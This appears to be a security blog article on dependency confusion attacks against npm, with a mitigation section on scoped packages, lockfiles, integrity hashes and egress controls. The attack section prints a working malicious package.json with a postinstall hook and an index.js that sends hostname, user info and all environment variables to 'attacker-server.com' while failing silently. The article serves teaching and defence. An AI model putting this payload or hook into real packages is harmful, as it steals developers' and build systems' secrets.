Dependency Confusion: The Supply Chain Attack in Your package.json

The modern software development landscape is built upon a foundation of open-source packages. Package managers like npm, PyPI, and RubyGems have accelerated development cycles, allowing teams to leverage a global ecosystem of pre-built components. However, this reliance on external dependencies has opened a new and insidious attack vector: the software supply chain.

One of the most critical and subtle vulnerabilities to emerge in this domain is Dependency Confusion. This attack exploits the ambiguous way package managers resolve dependencies, tricking build systems into downloading and executing malicious code from a public repository instead of a trusted, internal one. This article provides a deep dive into the mechanics of dependency confusion, its potential impact, and, most importantly, the practical steps you can take to secure your package.json and protect your organization.

What is Dependency Confusion?

At its core, dependency confusion, also known as a namespace confusion attack, is a supply chain attack that targets the logic of package manager clients. It occurs when a project depends on a package that exists in both a private, internal registry and a public registry (like npmjs.com) under the exact same name. The attack is executed when an adversary publishes a package with the same name to the public registry, but with a higher version number.

Think of it like ordering a specific part for a custom-built machine. Your company, “InnovateCorp,” manufactures a proprietary component called innovate-api-client and stores it in your private warehouse (your internal package registry). Your assembly instructions (package.json) simply say, “get innovate-api-client.” An external supplier, hearing about this part, decides to create a counterfeit version, also labels it innovate-api-client, and lists it in a global public catalog (the public npm registry) with a label that says “Version 2.0,” while your internal one is “Version 1.5.”

When your automated assembly robot (the package manager) is tasked with fetching the part, it scans both the private warehouse and the public catalog. Seeing that the public catalog offers a “newer” version (2.0 > 1.5), it prioritizes the latest available option, unwittingly installing the counterfeit, potentially booby-trapped component into your machine.

This is precisely how dependency confusion works. The package manager, in its default configuration, is often designed to fetch the highest semantic version of a package available from all configured sources. It becomes “confused” about which package to prioritize, and the attacker exploits this ambiguity to achieve remote code execution (RCE) on a developer’s machine or, more devastatingly, within a continuous integration/continuous deployment (CI/CD) pipeline.

The vulnerability was first brought to mainstream attention by security researcher Alex Birsan in a 2021 blog post, where he demonstrated successful breaches against major tech companies, including Apple, Microsoft, and Tesla, earning over $130,000 in bug bounties.

Anatomy of an Attack

The execution of a dependency confusion attack is alarmingly straightforward and can be broken down into a few key steps. The simplicity of the attack is what makes it so dangerous and scalable.

Reconnaissance: Finding Private Package Names

The first step for an attacker is to identify the names of internal, private packages used by a target organization. This is often the most challenging part, but there are numerous ways to leak this information. Attackers can scan public code repositories (like GitHub) for files such as package.json, which may have been accidentally committed. They can also scrape JavaScript files hosted on the company’s public websites, as these often contain require('internal-package-name') statements. Even internal network configurations or DNS logs can sometimes expose these names.

Creation of the Malicious Package

Once a list of potential internal package names is compiled (e.g., acme-auth-client, corp-logger, internal-api-helper), the attacker creates a malicious package for each name. The code within these packages is designed to execute upon installation. A common technique is to use the postinstall script in the package.json file. This script automatically runs after the package is installed.

A malicious package.json might look like this:

{
  "name": "acme-auth-client",
  "version": "99.99.99",
  "description": "A malicious package for dependency confusion attack.",
  "main": "index.js",
  "scripts": {
    "postinstall": "node index.js"
  },
  "author": "Attacker",
  "license": "ISC"
}

The Payload (index.js)

The index.js file contains the malicious payload. This could be anything, but a common proof-of-concept is to exfiltrate environment variables, which can contain sensitive secrets like API keys, database credentials, or internal network details. A simple exfiltration script might gather information like the user’s hostname, IP address, and environment variables and send it to an attacker-controlled server via an HTTP request.

// Malicious index.js
const os = require('os');
const http = require('http');

try {
  const data = JSON.stringify({
    hostname: os.hostname(),
    userInfo: os.userInfo(),
    env: process.env
  });

  const options = {
    hostname: 'attacker-server.com',
    port: 80,
    path: '/log',
    method: 'POST',
    headers: {
      'Content-Type': 'application/json',
      'Content-Length': data.length
    }
  };

  const req = http.request(options);
  req.write(data);
  req.end();
} catch (e) {
  // Fail silently
}

Publishing to a Public Registry

The attacker publishes this malicious package to the public npm registry. Crucially, they assign it a very high version number, like 99.99.99, to ensure it will almost certainly be higher than any internal version.

The Waiting Game

The attacker now waits. The next time a developer sets up a new environment or a CI/CD pipeline runs a clean build (npm install or yarn), the package manager will query its configured registries. If it’s configured to check both the public and private registries, it will see acme-auth-client@1.2.3 in the private registry and acme-auth-client@99.99.99 in the public one. It will select the latter, download it, and execute the postinstall script, triggering the payload. The attack is complete.

How Package Managers Get Tricked: The Resolution Logic

The success of a dependency confusion attack hinges entirely on the default dependency resolution behavior of package managers. Tools like npm, Yarn, and pip (for Python) are designed for developer convenience, and part of that convenience is automatically finding the “best” version of a dependency.

By default, when a package manager like npm is configured with multiple registries (a private one for internal packages and the default public one), its resolution algorithm can be problematic. If a package name is not explicitly scoped, the client may query all registries to see where that package is available. When it finds the package in multiple locations, the decision often comes down to the version number. The logic assumes that a higher version number represents a more recent and desirable release.

Consider a typical package.json entry:

"dependencies": {
  "internal-api-helper": "^1.4.0"
}

And a configuration file (.npmrc) that points to both a private and a public registry:

# .npmrc
@my-company:registry=https://npm.my-company.com/
registry=https://registry.npmjs.org/

In this configuration, any package scoped with @my-company will correctly be fetched from the private registry. However, for internal-api-helper (an unscoped package), npm might check both registries. If the private registry holds internal-api-helper@1.4.5 and the public npm registry holds the attacker’s internal-api-helper@99.99.99, the public version will be chosen, as it satisfies the ^1.4.0 semantic versioning range and is a much higher version. The build system has been successfully confused.

Mitigation Strategies: Securing Your Supply Chain

While dependency confusion is a serious threat, it is also a solvable problem. Protecting your organization requires a multi-layered approach focused on removing ambiguity from your dependency resolution process.

1. Use Scoped Packages (The Primary Defense)

The most effective and robust defense against dependency confusion is to use scoped packages for all internal projects. Scopes are a feature of npm that provides a namespace for your packages. A scoped package name starts with an @ symbol, followed by the organization’s name, and then a slash (e.g., @my-company/internal-api-helper).

How it works: By default, an unscoped package like internal-api-helper is considered to be in the public namespace. Anyone can attempt to publish it. However, a scoped package like @my-company/internal-api-helper belongs to the my-company namespace. An attacker cannot publish a package under your scope unless they have credentials for your npm organization. This effectively makes the package name globally unique and immune to this type of namespacing attack.

Implementation: To implement this, you need to configure your .npmrc file to associate your scope with your private registry.

# .npmrc
@my-company:registry=https://npm.my-company.com/
# Always use the official public registry for all other packages
registry=https://registry.npmjs.org/

With this configuration, any npm install command for a package starting with @my-company/ will only ever query your private registry, completely eliminating the confusion.

2. Version Pinning and Lockfiles

Using lockfiles (package-lock.json for npm, yarn.lock for Yarn) is a crucial best practice for ensuring deterministic and repeatable builds. A lockfile “locks” the dependency tree to the specific versions and locations of packages that were used in a successful build.

How it works: When you run npm install, a package-lock.json file is generated. This file contains the exact version of every package installed, its resolved location (URL), and a cryptographic hash of its contents (an integrity checksum).

// Snippet from package-lock.json
"internal-api-helper": {
  "version": "1.4.5",
  "resolved": "https://npm.my-company.com/internal-api-helper/-/internal-api-helper-1.4.5.tgz",
  "integrity": "sha512-..."
}

On subsequent installs (like in a CI/CD pipeline), npm ci should be used instead of npm install. The npm ci command performs a clean install strictly based on the lockfile, ignoring package.json. It will fetch the exact version from the specified resolved URL and verify its integrity hash. If a dependency confusion attack caused the public package to be installed during the initial npm install, the lockfile would unfortunately reflect that malicious package. However, once a correct lockfile is generated and committed, it prevents a future build from being tricked into downloading a newer, malicious public version.

Limitation: Version pinning is a powerful control but not a complete solution on its own. It does not protect the initial installation. If a developer’s machine is misconfigured or a package-lock.json is not present during the first install, the project is still vulnerable.

3. Verifying Package Integrity

The integrity field within a lockfile is a subresource integrity (SRI) hash. It acts as a digital fingerprint for the package tarball. When the package manager downloads a dependency, it calculates its hash and compares it against the value in the lockfile. If they do not match, the installation will fail. This provides strong protection against a package being tampered with in transit or a different package being served from the same URL, but it relies on the lockfile being correct in the first place.

4. Explicit Registry Configuration

For environments where unscoped internal packages are a legacy reality and cannot be immediately migrated, you must be explicit about where the package manager should look for them. While less robust than using scopes, you can configure your build environment to always prioritize your private registry. However, this can be complex and may have unintended side effects, such as blocking access to legitimate public packages. The recommended approach remains migrating to scoped packages.

5. Network Controls and Auditing

As a final layer of defense, especially for critical build servers, network controls can be implemented.

Firewall Rules: Configure egress firewall rules to block build servers from making outbound requests to public registries like registry.npmjs.org. All dependencies, including public ones, should be fetched from a private registry that acts as a secure proxy or mirror.

Dependency Auditing: Regularly use tools like npm audit and commercial Software Composition Analysis (SCA) solutions. These tools can scan your dependencies for known vulnerabilities and, in some cases, detect suspicious packages or dependency resolution patterns.

Conclusion: A Proactive Stance on Supply Chain Security

Dependency confusion is a stark reminder that our software supply chains are a prime target for attackers. The attack’s elegance lies in its simplicity and its exploitation of default, convenience-oriented behaviors in the tools we use every day. It transforms a project’s package.json from a simple list of dependencies into a potential entry point for malicious code.

However, the threat is entirely manageable. The solution is not to abandon the open-source ecosystem but to adopt a more deliberate and security-conscious approach to dependency management. By embracing scoped packages as a primary defense, enforcing the use of lockfiles, and implementing robust registry configurations, organizations can effectively eliminate this vector of attack.

Securing the software supply chain is no longer a peripheral task; it is a central pillar of modern application security. The time to review your dependencies and fortify your build processes is now, before your package manager’s confusion becomes your organization’s security incident.

Search This Blog

InstaTunnel